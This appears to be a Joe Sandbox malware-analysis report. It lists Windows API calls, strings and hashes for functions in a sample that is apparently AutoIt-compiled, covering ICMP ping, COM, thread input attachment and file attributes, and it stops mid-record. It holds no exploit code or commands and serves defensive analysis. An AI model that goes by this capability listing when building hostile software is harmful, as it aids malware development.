IcmpCreateFile.IPHLPAPI ref: 00260636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002606C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002606E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002607B9
WSACleanup.WSOCK32 ref: 002607BF

Strings

Ping, xrefs: 00260676

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 1a5e1d42fede76067564e3e6326ac52890e08489fbb64f426b396bdbc04ab2bb
Instruction ID: b5713db49bc8f0486bb1e2fac8b6b50329a3f9fe1aa5be2374e72e69e930bf1a
Opcode Fuzzy Hash: 1a5e1d42fede76067564e3e6326ac52890e08489fbb64f426b396bdbc04ab2bb
Instruction Fuzzy Hash: C6919E356142429FD321CF25D8C8F1BBBE4AF44318F1485A9F46A8B6A2C770ED91DF91

Function 00268CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00268CF3

Part of subcall function 00248E54: _wcslen.LIBCMT ref: 00248E77

_wcslen.LIBCMT ref: 00268D4E
_wcslen.LIBCMT ref: 00268D9C
_wcslen.LIBCMT ref: 00268DDC
_wcslen.LIBCMT ref: 00268E6E

Strings

stdcall, xrefs: 00268DD6, 00268DDB
cdecl, xrefs: 00268D48, 00268D4D
winapi, xrefs: 00268D96, 00268D9B
none, xrefs: 00268E65, 00268E6A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 92175172fe2f0033ffad2ed6bb6bd7d3ae3744387879e5bb47edd7afb7369d36
Instruction ID: 8fc83b6135982bfb9c971d7122a8dce29f468629be6b6d230a21b5903ed03d7c
Opcode Fuzzy Hash: 92175172fe2f0033ffad2ed6bb6bd7d3ae3744387879e5bb47edd7afb7369d36
Instruction Fuzzy Hash: B751BF31A205179BCB24DF68C8509BEB3A5BF65724B604329F926E72C4EB31DDA0C790

Function 0026372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00263774
CoUninitialize.OLE32 ref: 0026377F
CoCreateInstance.OLE32(?,00000000,00000017,0027FB78,?), ref: 002637D9
IIDFromString.OLE32(?,?), ref: 0026384C
VariantInit.OLEAUT32(?), ref: 002638E4
VariantClear.OLEAUT32(?), ref: 00263936

Strings

Invalid parameter, xrefs: 00263865
NULL Pointer assignment, xrefs: 0026381E
Failed to create object, xrefs: 002637E4, 0026389A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 96fd24e2baeae62c07f1a44cb515fc36dd4819d7924cdf0ee47537b6c82daf44
Instruction ID: 16ed3241b1f02f6109fe143d14a9fe1501b76402989d1be31402a3a3b5193359
Opcode Fuzzy Hash: 96fd24e2baeae62c07f1a44cb515fc36dd4819d7924cdf0ee47537b6c82daf44
Instruction Fuzzy Hash: FF61B370628701AFD311DF64D889FAAB7E4EF49710F10081DF9859B291D770EE98CB92

Function 00278B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

Part of subcall function 001F912D: GetCursorPos.USER32(?), ref: 001F9141
Part of subcall function 001F912D: ScreenToClient.USER32(00000000,?), ref: 001F915E
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000001), ref: 001F9183
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000002), ref: 001F919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00278B6B
ImageList_EndDrag.COMCTL32 ref: 00278B71
ReleaseCapture.USER32 ref: 00278B77
SetWindowTextW.USER32(?,00000000), ref: 00278C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00278C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00278CFF

Strings

@GUI_DRAGFILE, xrefs: 00278C9A
p#+, xrefs: 00278C71
@GUI_DROPID, xrefs: 00278C51

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#+
API String ID: 1924731296-3493582189
Opcode ID: 6ffa95c9092bae54b3996f81882fad7725936e0f86e5ca1bea58c39b26bad142
Instruction ID: 8c7ebb2b2d6bb1452adb733e481a6f1d39da4afb39041dcecc2af333b41d947a
Opcode Fuzzy Hash: 6ffa95c9092bae54b3996f81882fad7725936e0f86e5ca1bea58c39b26bad142
Instruction Fuzzy Hash: 27519C71104344AFD704EF24DC9AFAE77E4FB88714F50062DF99A972A1CB709964CBA2

Function 00253388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002533CF

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002533F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00253504
Error: , xrefs: 002534D1
Line %d (File "%s"):, xrefs: 00253443, 0025345C
^ ERROR , xrefs: 0025349E
Incorrect parameters to object property !, xrefs: 002534AB
"%s" (%d) : ==> %s:, xrefs: 00253522

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 70a06677de0c6d99f26213e153f8a1e53c76ecda036c19ea329330c6b704efa6
Instruction ID: 9e6e3a6c15ace70b6790f6c2b65f64d9f68bc1d78fcd21206573378f62708761
Opcode Fuzzy Hash: 70a06677de0c6d99f26213e153f8a1e53c76ecda036c19ea329330c6b704efa6
Instruction Fuzzy Hash: 7051C231910649ABDF19EBE1DD46EEEB7B8AF25340F644165F40572062EB312FA8CF60

Function 0024B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0024B5FC
_wcslen.LIBCMT ref: 0024B608
_wcslen.LIBCMT ref: 0024B64D
_wcslen.LIBCMT ref: 0024B68C
_wcslen.LIBCMT ref: 0024B6C7

Strings

REMOVE, xrefs: 0024B602, 0024B607
EXISTS, xrefs: 0024B686, 0024B68B
APPEND, xrefs: 0024B6C1, 0024B6C6
KEYS, xrefs: 0024B647, 0024B64C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 1b3e652089e1b82b28a2b653a55b16d5b9ddc1c6291df7a777213217507e0c7c
Instruction ID: 84f8a7fdbfc2e22c5c6501e5d36834a15dd14d089df402fda04b14483277b9f6
Opcode Fuzzy Hash: 1b3e652089e1b82b28a2b653a55b16d5b9ddc1c6291df7a777213217507e0c7c
Instruction Fuzzy Hash: A3412B32A201279BCB156F7DCC905BEB7A9EFA1754B264129E821DB284E731CDA1C790

Function 00255393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002553A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00255416
GetLastError.KERNEL32 ref: 00255420
SetErrorMode.KERNEL32(00000000,READY), ref: 002554A7

Strings

INVALID, xrefs: 00255459
UNKNOWN, xrefs: 00255444
READONLY, xrefs: 00255452
NOTREADY, xrefs: 0025544B
READY, xrefs: 00255460, 00255468

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 42c47edf6cc3d41b7f54688337962c2f3b3c9cd3607c63905453dfa8dfab6cbd
Instruction ID: 4387dfa62d412d7753c492ff4b8f239fcfa50ffa211d2186eee5a52535efebc8
Opcode Fuzzy Hash: 42c47edf6cc3d41b7f54688337962c2f3b3c9cd3607c63905453dfa8dfab6cbd
Instruction Fuzzy Hash: 4531F235A106159FD710DF68C498EAEBBF4FF05306F188069E805CB292DB70ED9ACB90

Function 00273C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00273C79
SetMenu.USER32(?,00000000), ref: 00273C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00273D10
IsMenu.USER32(?), ref: 00273D24
CreatePopupMenu.USER32 ref: 00273D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00273D5B
DrawMenuBar.USER32 ref: 00273D63

Strings

F, xrefs: 00273D4E
0, xrefs: 00273C54

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: b5693ade1d5e881bf54cc889c8add979ca69b6caf2c667e290309053f8ab471b
Instruction ID: 04e69e1b2fe74d11ca1fe5ab3f4f02ac20ac30522aee74d99f4ac1277ad1f1df
Opcode Fuzzy Hash: b5693ade1d5e881bf54cc889c8add979ca69b6caf2c667e290309053f8ab471b
Instruction Fuzzy Hash: C0419E74A1120AEFDB24CF64E848ADA77B5FF49300F14402DF94AA7360D771AA20DF90

Function 00273A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00273A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00273AA0
GetWindowLongW.USER32(?,000000F0), ref: 00273AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00273AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00273B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00273BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00273BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00273BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00273BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00273C13

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 919503dc5734a1c2fe732a2be9636a09994b286a6dfcaddbeaefb51e73e94a7c
Instruction ID: 87e5524caf5a9ddef75967e8ff421de8b5cf7724667f54e48696101219d686de
Opcode Fuzzy Hash: 919503dc5734a1c2fe732a2be9636a09994b286a6dfcaddbeaefb51e73e94a7c
Instruction Fuzzy Hash: 3B618B75910248AFDB11DFA8CC85EEE77B8EB09704F10419AFA19E72A1C770AE61DF50

Function 0024B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0024B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B165
GetWindowThreadProcessId.USER32(00000000), ref: 0024B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0024B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B21D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: ddbb134dd2cc00fb204ebc90c2553de5f4a84b9dd453fd9a12494ff08d585f73
Instruction ID: 34903da49a9a16e21662fb7eb2d75878e7e45e1282b08472b893df5375aad492
Opcode Fuzzy Hash: ddbb134dd2cc00fb204ebc90c2553de5f4a84b9dd453fd9a12494ff08d585f73
Instruction Fuzzy Hash: 1C319C75560209BFDB16EF24EC8CB6D7BADBF51311F204519FA09D6190D7B4DA808F60

Function 00212C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00212C94

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0

_free.LIBCMT ref: 00212CA0
_free.LIBCMT ref: 00212CAB
_free.LIBCMT ref: 00212CB6
_free.LIBCMT ref: 00212CC1
_free.LIBCMT ref: 00212CCC
_free.LIBCMT ref: 00212CD7
_free.LIBCMT ref: 00212CE2
_free.LIBCMT ref: 00212CED
_free.LIBCMT ref: 00212CFB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1f3a7c3a312f9b48a339e20ad5fe62e2b7ab19a37bf653b2c23c040604eef8f4
Instruction ID: a9b284510db150c21b103f38257ef737fd9d19caf18c4ce0d3c2de7e64003aa3
Opcode Fuzzy Hash: 1f3a7c3a312f9b48a339e20ad5fe62e2b7ab19a37bf653b2c23c040604eef8f4
Instruction Fuzzy Hash: 6B119676120108EFCB02EF58D842DDD3BA5FF15360F5154A5FA485F222D631EAB49F90

Function 001E1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001E1459
OleUninitialize.OLE32(?,00000000), ref: 001E14F8
UnregisterHotKey.USER32(?), ref: 001E16DD
DestroyWindow.USER32(?), ref: 002224B9
FreeLibrary.KERNEL32(?), ref: 0022251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0022254B

Strings

close all, xrefs: 001E1454

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 512f3fe0bb164c7c356d6a0e46235e5dccceda885596f04353fc139a9b435c4f
Instruction ID: 181f6d3e95246d14e7bd016461c79d6583668ac9cb8e6a5e4431250c1d562ed9
Opcode Fuzzy Hash: 512f3fe0bb164c7c356d6a0e46235e5dccceda885596f04353fc139a9b435c4f
Instruction Fuzzy Hash: 52D1DF31711662EFCB28EF55D498B2DF7A4BF05700F61819DE90A6B252CB31AD26CF50

Function 00257DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00257FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00257FC1
GetFileAttributesW.KERNEL32(?), ref: 00257FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00258005
SetCurrentDirectoryW.KERNEL32(?), ref: 00258017
SetCurrentDirectoryW.KERNEL32(?), ref: 00258060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002580B0

Strings

*.*, xrefs: 00258066

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 0b8f9c1f0f9b15d01117f3295b2ce5e5294fb7e23387cf17ce166e81d1a8ad80
Instruction ID: 5e749161f4fd989fbfbbce6dae75540c6277d4fca4dd230e7451e241c141e584
Opcode Fuzzy Hash: 0b8f9c1f0f9b15d01117f3295b2ce5e5294fb7e23387cf17ce166e81d1a8ad80
Instruction Fuzzy Hash: 3381F0715283429BCB20EF14D8459AEB3E8BF88311F14486EFC85D7250EB70DD59CB96

Function 001E5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 001E5C7A

Part of subcall function 001E5D0A: GetClientRect.USER32(?,?), ref: 001E5D30
Part of subcall function 001E5D0A: GetWindowRect.USER32(?,?), ref: 001E5D71
Part of subcall function 001E5D0A: ScreenToClient.USER32(?,?), ref: 001E5D99

GetDC.USER32 ref: 002246F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00224708
SelectObject.GDI32(00000000,00000000), ref: 00224716
SelectObject.GDI32(00000000,00000000), ref: 0022472B
ReleaseDC.USER32(?,00000000), ref: 00224733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002247C4

Strings

U, xrefs: 00224693

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2e97f8e11cd7baa5e1808144bba4f74c34d92c7394ab1ce786f83a8a256eb3ae
Instruction ID: 8d0bfd40736927108e5d2edb3a659d51d051ced7c38d1486b3f8c750cfdd6c7c
Opcode Fuzzy Hash: 2e97f8e11cd7baa5e1808144bba4f74c34d92c7394ab1ce786f83a8a256eb3ae
Instruction Fuzzy Hash: 21711530410606EFCF259FA4E984AFA7BBAFF4A314F244269ED655A166C3319CA1CF50

Function 0025359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002535E4

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

LoadStringW.USER32(002B2390,?,00000FFF,?), ref: 0025360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00253724
Error: , xrefs: 002536EF
Line %d (File "%s"):, xrefs: 0025366B
^ ERROR, xrefs: 002536C9
"%s" (%d) : ==> %s:, xrefs: 00253742

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 4a1980aa4b774f3f4e7d1e130bb4af6f0ff98df6ed8f61d5c4f2c279adb2809e
Instruction ID: 178ebfbd64bbe893dd3754c20d8b13fd451a79001d46bea0859feb93dc1d7556
